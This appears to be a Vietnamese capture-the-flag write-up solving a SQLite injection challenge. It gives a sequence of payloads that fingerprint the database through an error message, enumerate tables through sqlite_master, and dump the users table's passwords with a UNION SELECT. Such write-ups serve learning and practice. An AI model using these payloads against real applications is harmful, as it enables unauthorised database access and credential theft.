NHÌN QUA CHALL
SQL INJECTION MÀ , QUA PAGE LOGIN NGÓ TÍ
MẤT 15 PHÚT FUZZ VÀO CÁI FORM CHẾT TIỆT NÀY DƯỚI ĐỦ HÌNH THỨC, NHẬN RA TA PHẢI QUAY ĐẦU SÁNG PAGE KHÁC .
TIẾP TỤC FUZZ CÂU BÁ ĐẠO
admin' or 1=1--
NOTHING HAPPEN .
THỨ XUẤT HIỆN CHỈ LÀ KẾT QUẢ TÌM KIẾM THÔNG THƯỜNG -_- . KHÔNG HIỂU DO FUZZ NHIỀU HÓA ĐIÊN HAY LÀ LINH TÍNH , TIẾP TỤC FUZZ 1 CÂU KHÁC , CÂU TÌM SỐ CỘT
admin'order by 10--VÀ KHÔNG PHỤ LÒNG , CỦA NỢ ĐÃ XUẤT HIỆN
Warning: SQLite3::query(): Unable to prepare statement: 1, 1st ORDER BY term out of range - should be between 1 and 2 in /challenge/web-serveur/ch19/index.php on line 150 1st ORDER BY term out of range - should be between 1 and 2
HAHA . V LÀ BIẾT ĐƯỢC HỆ CSDL LÀ SQLITE3 . SỐ CỘT LÀ 2 .
TIẾP TỤC THEO QUÁN TÍNH , TÌM XEM CỘT NÀO CÓ THỂ PRINT DỮ LIỆU RA NGOÀI THÌ PHÁT HIỆN ĐÓ LÀ CỘT 1 .
SEARCH GOOGLE ĐỌC MẤT NỬA TIẾNG VỀ SQLITE3 VÀ THỬ 1 VÀI CÂU QUERY NÀO !
null' union select tbl_name,2 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--
VẬY LA CÓ 2 BẢNG LÀ "users" , "news" . DĨ NHIÊN CÁI TA QUAN TÂM LÀ CÁI GÌ THÌ KHỎI CẦN NÓI .
TIẾP TỤC TRUY VẤN TÌM SỐ CỘT CỦA MỖI BẢNG
null' union select substr(sql,1,1000),2 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
BÙM
OK . 2 BẢNG VÀ TOÀN BỘ CỘT MỖI BẢNG ĐÃ RA ĐẦU THÚ .
CỘT TA QUAN TÂM DĨ NHIEN LÀ "username" và "password" rồi . Tôi thì chỉ quan tâm đến cột password thôi :D . kiểu gì chả có admin trong đấy .
TIẾP TỤC CÀ NHẸ
null' union select password,2 FROM users--
PASSWORD ĐÃ PHỌT RA RỒI , CÒN KHÔNG MAU MANG TỪNG CÁI SUBMIT XEM , CÁI NÀO DC 30K THÌ CHÍNH LÀ CHÁU NÓ
HAPPY HACKING!
